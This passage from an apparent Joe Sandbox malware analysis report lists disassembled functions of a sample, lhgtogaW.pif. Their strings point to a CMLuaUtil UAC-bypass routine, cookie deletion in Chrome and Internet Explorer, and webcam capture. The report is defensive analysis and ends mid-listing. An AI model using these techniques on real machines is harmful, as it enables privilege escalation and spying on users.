                                                                                                                                                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                                                                                                                      • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                                                                                                                    • _wcslen.LIBCMT ref: 0041B763
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                                                                    • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                                                    • API String ID: 3286818993-122982132
                                                                                                                                                                    • Opcode ID: 7be9ddbdca4c236add55560158a3964ade8c49d0730efc843a2acc4574998768
                                                                                                                                                                    • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                                                                                                                                                    • Opcode Fuzzy Hash: 7be9ddbdca4c236add55560158a3964ade8c49d0730efc843a2acc4574998768
                                                                                                                                                                    • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                                                                                                                      • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                                                                                                                                                      • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                                                                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                                                                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                                                                    • API String ID: 1133728706-4073444585
                                                                                                                                                                    • Opcode ID: 33945536062316160c63ff990a743b18c923748d39ad6fb90c9b27f0130b1a82
                                                                                                                                                                    • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                                                                                                                                                    • Opcode Fuzzy Hash: 33945536062316160c63ff990a743b18c923748d39ad6fb90c9b27f0130b1a82
                                                                                                                                                                    • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: b15328f38de36e2236e67be376e02f2a3afc52644fcc3b23babb247561bddb00
                                                                                                                                                                    • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                                                                                                                                                    • Opcode Fuzzy Hash: b15328f38de36e2236e67be376e02f2a3afc52644fcc3b23babb247561bddb00
                                                                                                                                                                    • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00450EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                                                                                                                                                    • _free.LIBCMT ref: 00450F48
                                                                                                                                                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                                                                                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                                                                                                    • _free.LIBCMT ref: 00450F53
                                                                                                                                                                    • _free.LIBCMT ref: 00450F5E
                                                                                                                                                                    • _free.LIBCMT ref: 00450FB2
                                                                                                                                                                    • _free.LIBCMT ref: 00450FBD
                                                                                                                                                                    • _free.LIBCMT ref: 00450FC8
                                                                                                                                                                    • _free.LIBCMT ref: 00450FD3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                    • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                                    • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                                                                                                                                                    • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                                    • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 274C9221: _free.LIBCMT ref: 274C924A
                                                                                                                                                                    • _free.LIBCMT ref: 274C92AB
                                                                                                                                                                      • Part of subcall function 274C571E: HeapFree.KERNEL32(00000000,00000000,?,274C924F,?,00000000,?,00000000,?,274C9276,?,00000007,?,?,274C7E5A,?), ref: 274C5734
                                                                                                                                                                      • Part of subcall function 274C571E: GetLastError.KERNEL32(?,?,274C924F,?,00000000,?,00000000,?,274C9276,?,00000007,?,?,274C7E5A,?,?), ref: 274C5746
                                                                                                                                                                    • _free.LIBCMT ref: 274C92B6
                                                                                                                                                                    • _free.LIBCMT ref: 274C92C1
                                                                                                                                                                    • _free.LIBCMT ref: 274C9315
                                                                                                                                                                    • _free.LIBCMT ref: 274C9320
                                                                                                                                                                    • _free.LIBCMT ref: 274C932B
                                                                                                                                                                    • _free.LIBCMT ref: 274C9336
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                    • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                    • Instruction ID: dda3dcf89ba6e3c649a39e7320b097c8bad52c299d1e85cf9a8ca327e8f5d0cb
                                                                                                                                                                    • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                    • Instruction Fuzzy Hash: D6118139541B08FAD622EBB0DC46FDBBB9DAF94B10F400C2CA6DD76092DA34B6444752
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                                                                                                                                                    • int.LIBCPMT ref: 00411183
                                                                                                                                                                      • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                                                                                                                                      • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 004111C3
                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                    • String ID: (mG
                                                                                                                                                                    • API String ID: 2536120697-4059303827
                                                                                                                                                                    • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                                                                                                                                    • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                                                                                                                                                    • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                                                                                                                                    • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                    • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                                                                                                                    • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                                                                                                                                                    • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                                                                                                                    • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\Public\Libraries\lhgtogaW.pif), ref: 004075D0
                                                                                                                                                                      • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                                                                                                                                                      • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00407629
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                                                                    • String ID: C:\Users\Public\Libraries\lhgtogaW.pif$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                                                                    • API String ID: 3851391207-1691353511
                                                                                                                                                                    • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                                                                                                                                    • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                                                                                                                                                    • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                                                                                                                                    • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040BAE7
                                                                                                                                                                    Strings
                                                                                                                                                                    • UserProfile, xrefs: 0040BAAD
                                                                                                                                                                    • [Chrome Cookies not found], xrefs: 0040BB01
                                                                                                                                                                    • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                                                                                                                                                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DeleteErrorFileLast
                                                                                                                                                                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                                                    • API String ID: 2018770650-304995407
                                                                                                                                                                    • Opcode ID: 167214da9fedc2eb77704bddeaa2e6e6e0e18728c289feeb4f38cfb7b5f99995
                                                                                                                                                                    • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                                                                                                                                                    • Opcode Fuzzy Hash: 167214da9fedc2eb77704bddeaa2e6e6e0e18728c289feeb4f38cfb7b5f99995
                                                                                                                                                                    • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __allrem.LIBCMT ref: 0043AC69
                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                                                                                                                                                    • __allrem.LIBCMT ref: 0043AC9C
                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                                                                                                                                                    • __allrem.LIBCMT ref: 0043ACD1
                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1992179935-0
                                                                                                                                                                    • Opcode ID: 62332627f6279ece4fdf0222086194dbbb93a47f3123b1b6f0685f97dcd8be1f
                                                                                                                                                                    • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                                                                                                                                                    • Opcode Fuzzy Hash: 62332627f6279ece4fdf0222086194dbbb93a47f3123b1b6f0685f97dcd8be1f
                                                                                                                                                                    • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C8821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,274C6FFD,00000000,?,?,?,274C8A72,?,?,00000100), ref: 274C887B
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,274C8A72,?,?,00000100,5EFC4D8B,?,?), ref: 274C8901
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 274C89FB
                                                                                                                                                                    • __freea.LIBCMT ref: 274C8A08
                                                                                                                                                                      • Part of subcall function 274C56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 274C5702
                                                                                                                                                                    • __freea.LIBCMT ref: 274C8A11
                                                                                                                                                                    • __freea.LIBCMT ref: 274C8A36
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1414292761-0
                                                                                                                                                                    • Opcode ID: 2e811c892a9d4478e002c97e278a8599a769b05694c12ea03615b31654c61cff
                                                                                                                                                                    • Instruction ID: 3e945d368367d1693962ae6bb9ab30a5be085774df8d3e4a4406b84f8308b48d
                                                                                                                                                                    • Opcode Fuzzy Hash: 2e811c892a9d4478e002c97e278a8599a769b05694c12ea03615b31654c61cff
                                                                                                                                                                    • Instruction Fuzzy Hash: E351F17A610216EBEB15CE64CC82EEF77ADEF90A50F15066CFD05D6240EB35EC50C6A1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                                                                                                                                                                      • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prologSleep
                                                                                                                                                                    • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                                                                                                                    • API String ID: 3469354165-3054508432
                                                                                                                                                                    • Opcode ID: 7b72aa305f758bf781defca2e279de6e5822457e0172eecf3386bf6e7fc9c232
                                                                                                                                                                    • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                                                                                                                                                    • Opcode Fuzzy Hash: 7b72aa305f758bf781defca2e279de6e5822457e0172eecf3386bf6e7fc9c232
                                                                                                                                                                    • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __cftoe
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4189289331-0
                                                                                                                                                                    • Opcode ID: 9a4a9018df91bb80547d8cd227be064c11647db9cc7a9b7c485a3b8778a52ece
                                                                                                                                                                    • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                                                                                                                                                    • Opcode Fuzzy Hash: 9a4a9018df91bb80547d8cd227be064c11647db9cc7a9b7c485a3b8778a52ece
                                                                                                                                                                    • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C15DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _strlen.LIBCMT ref: 274C1607
                                                                                                                                                                    • _strcat.LIBCMT ref: 274C161D
                                                                                                                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,274C190E,?,?,00000000,?,00000000), ref: 274C1643
                                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 274C165A
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,274C190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 274C1661
                                                                                                                                                                    • lstrcatW.KERNEL32(00001008,?), ref: 274C1686
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1922816806-0
                                                                                                                                                                    • Opcode ID: 2e6c6afc88f899ec7ebb776b6782e1b51f8a7a92cc42df24008b78ec79f0509f
                                                                                                                                                                    • Instruction ID: f3ef1cde321db9c49340fd69626abf99d40859b1124eca321d59e72522780a42
                                                                                                                                                                    • Opcode Fuzzy Hash: 2e6c6afc88f899ec7ebb776b6782e1b51f8a7a92cc42df24008b78ec79f0509f
                                                                                                                                                                    • Instruction Fuzzy Hash: B021DA7AA00204ABD705DF59DC81EFE77B8EF98B14F24401EEA04EB141DF34A54187AA
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C1000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 274C1038
